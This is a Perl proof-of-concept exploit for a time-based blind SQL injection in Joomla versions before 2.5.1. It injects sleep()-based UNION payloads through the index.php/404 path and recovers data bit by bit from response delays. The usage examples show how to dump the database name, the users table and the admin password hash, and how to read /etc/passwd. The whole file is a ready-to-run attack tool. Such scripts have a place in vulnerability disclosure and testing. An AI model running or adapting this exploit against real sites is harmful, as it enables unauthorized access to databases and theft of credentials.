#!/usr/bin/perl
# Thu Mar 15 22:55:32 CET 2012 A. Ramos <aramosf()unsec.net>
# www.securitybydefault.com
# Joomla <2.5.1 time based sql injection - vuln by Colin Wong
# 
# using sleep() and not benchmark(), change for < mysql 5.0.12 
#
# 1.- Database name: database()
# 2.- Users data table name: (change 'joomla' for database() result) 
# 	select table_name from information_schema.tables where table_schema = "joomla" and table_name like "%_users"
# 3.- Admin password: (change zzz_users from previus sql query result)
# 	select password from zzzz_users limit 1



use strict;
use LWP::UserAgent;
$| = 1;


my $url = $ARGV[0];
my $wtime = $ARGV[1];
my $sql = $ARGV[2];

unless ($ARGV[2]) {
 print "$0 <url> <wait time> <sql>\n";
 print "\texamples:\n";
 print "\t get admin password:\n";
 print "\t\t$0 http://host/joomla/ 3 'database()'\n";
 print "\t\t$0 http://host/joomla/ 3 'select table_name from information_schema.tables where table_schema=\"joomla\" and table_name like \"%25_users\"\'\n";
 print "\t\t$0 http://host/joomla/ 3 'select password from zzzz_users limit 1'\n";
 print "\t get file /etc/passwd\n";
 print "\t\t$0 http://host/joomla/ 3 'load_file(\"/etc/passwd\")'\n";
 exit 1;
}

my ($len,$sqldata);

my $ua = LWP::UserAgent->new;
$ua->timeout(60);
$ua->env_proxy;

my $stime = time();
my $res = $ua->get($url);
my $etime = time();
my $regrtt = $etime - $stime;
print "rtt: $regrtt secs\n";
print "vuln?: ";

my $sleep = $regrtt + $wtime;
$stime = time();
$res = $ua->get($url."/index.php/404' union select sleep($sleep) union select '1");
$etime = time();
my $rtt = $etime - $stime;
if ($rtt >= $regrtt + $wtime) { print "ok!\n"; } else { print "nope :(\n"; exit 1; }


my $lenoflen;
sub len {
 # length of length
 for (1..5) { 
	my $sql=$_[0];
	$stime = time();
	$res = $ua->get($url."/index.php/404' union select if(length(length(($sql)))=$_,sleep($wtime),null) union select '1");
	$etime = time();
	my $rtt = $etime - $stime;
	if ($rtt >= $regrtt + $wtime) {
		$lenoflen = $_;
		last;
	}
 }
 for (1..$lenoflen) {
  my $ll;
  $ll=$_;
  for (0..9) {
	my $sql=$_[0];
	$stime = time();
	$res = $ua->get($url."/index.php/404' union select if(mid(length(($sql)),$ll,1)=$_,sleep($wtime),null) union select '1");
	$etime = time();
	my $rtt = $etime - $stime;
	if ($rtt >= $regrtt + $wtime) {
		$len .= $_;
	}
  }
 }
	return $len;

}

sub data {
 my $sql = $_[0];
 my $len = $_[1];
 my ($bit, $str, @byte);
 my $high = 128;

 for (1..$len) {
 	my $c=8;
 	@byte="";
	my $a=$_;
	for ($bit=1;$bit<=$high;$bit*=2) {
		$stime = time();
		# select if((ord(mid((load_file("/etc/passwd")),1,1)) & 64)=0,sleep(2),null) union select '1';
		$res = $ua->get($url."/index.php/404' union select if((ord(mid(($sql),$a,1)) & $bit)=0,sleep($wtime),null) union select '1");
		$etime = time();
		my $rtt = $etime - $stime;
		if ($rtt >= $regrtt + $wtime) {
			$byte[$c]="0";
		} else { $byte[$c]="1"; }
	$c--;
	}
   	$str = join("",@byte);
	print pack("B*","$str");
  } 
}

$len = len($sql);
print "$sql length: $len\n";
print "$sql data:\n\n";
data($sql,$len);